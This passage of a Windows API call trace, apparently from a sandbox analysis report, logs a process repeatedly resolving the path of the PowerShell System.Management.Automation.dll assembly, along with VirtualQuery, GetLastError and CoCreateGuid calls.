lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.201] GetLastError () returned 0x0 [0152.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.202] GetLastError () returned 0x0 [0152.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.202] GetLastError () returned 0x0 [0152.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.202] GetLastError () returned 0x0 [0152.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.202] GetLastError () returned 0x0 [0152.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.202] GetLastError () returned 0x0 [0152.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.202] GetLastError () returned 0x0 [0152.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.202] GetLastError () returned 0x0 [0152.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.202] GetLastError () returned 0x0 [0152.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.202] GetLastError () returned 0x0 [0152.202] VirtualQuery (in: lpAddress=0x12d434, lpBuffer=0x12e434, dwLength=0x1c | out: lpBuffer=0x12e434*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.203] GetLastError () returned 0x0 [0152.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.203] GetLastError () returned 0x0 [0152.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.203] GetLastError () returned 0x0 [0152.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.203] GetLastError () returned 0x0 [0152.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.203] GetLastError () returned 0x0 [0152.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.203] GetLastError () returned 0x0 [0152.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.203] GetLastError () returned 0x0 [0152.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.203] GetLastError () returned 0x0 [0152.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.203] GetLastError () returned 0x0 [0152.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.203] GetLastError () returned 0x0 [0152.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.203] GetLastError () returned 0x0 [0152.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.251] GetLastError () returned 0x0 [0152.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.251] GetLastError () returned 0x0 [0152.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.251] GetLastError () returned 0x0 [0152.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.251] GetLastError () returned 0x0 [0152.251] VirtualQuery (in: lpAddress=0x12d434, lpBuffer=0x12e434, dwLength=0x1c | out: lpBuffer=0x12e434*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.251] GetLastError () returned 0x0 [0152.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.251] GetLastError () returned 0x0 [0152.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.251] GetLastError () returned 0x0 [0152.251] VirtualQuery (in: lpAddress=0x12d434, lpBuffer=0x12e434, dwLength=0x1c | out: lpBuffer=0x12e434*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.252] GetLastError () returned 0x0 [0152.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.252] GetLastError () returned 0x0 [0152.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.252] GetLastError () returned 0x0 [0152.252] VirtualQuery (in: lpAddress=0x12d064, lpBuffer=0x12e064, dwLength=0x1c | out: lpBuffer=0x12e064*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.252] VirtualQuery (in: lpAddress=0x12d0a0, lpBuffer=0x12e0a0, dwLength=0x1c | out: lpBuffer=0x12e0a0*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.252] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.252] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.253] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.253] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.253] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.253] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.253] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.253] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.253] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.254] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.254] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.254] VirtualQuery (in: lpAddress=0x12d20c, lpBuffer=0x12e20c, dwLength=0x1c | out: lpBuffer=0x12e20c*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.254] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.254] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.254] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.255] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.255] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x2b0689d3, Data2=0x63d4, Data3=0x4f41, Data4=([0]=0xad, [1]=0x9a, [2]=0xbe, [3]=0xdc, [4]=0x1d, [5]=0xdc, [6]=0xf9, [7]=0x8d))) returned 0x0 [0152.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.255] GetLastError () returned 0x0 [0152.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.255] GetLastError () returned 0x0 [0152.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.255] GetLastError () returned 0x0 [0152.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.255] GetLastError () returned 0x0 [0152.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.255] GetLastError () returned 0x0 [0152.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.255] GetLastError () returned 0x0 [0152.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.255] GetLastError () returned 0x0 [0152.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.255] GetLastError () returned 0x0 [0152.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.256] GetLastError () returned 0x0 [0152.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.256] GetLastError () returned 0x0 [0152.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.256] GetLastError () returned 0x0 [0152.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.256] GetLastError () returned 0x0 [0152.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.256] GetLastError () returned 0x0 [0152.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.256] GetLastError () returned 0x0 [0152.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.256] GetLastError () returned 0x0 [0152.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.256] GetLastError () returned 0x0 [0152.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.256] GetLastError () returned 0x0 [0152.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.256] GetLastError () returned 0x0 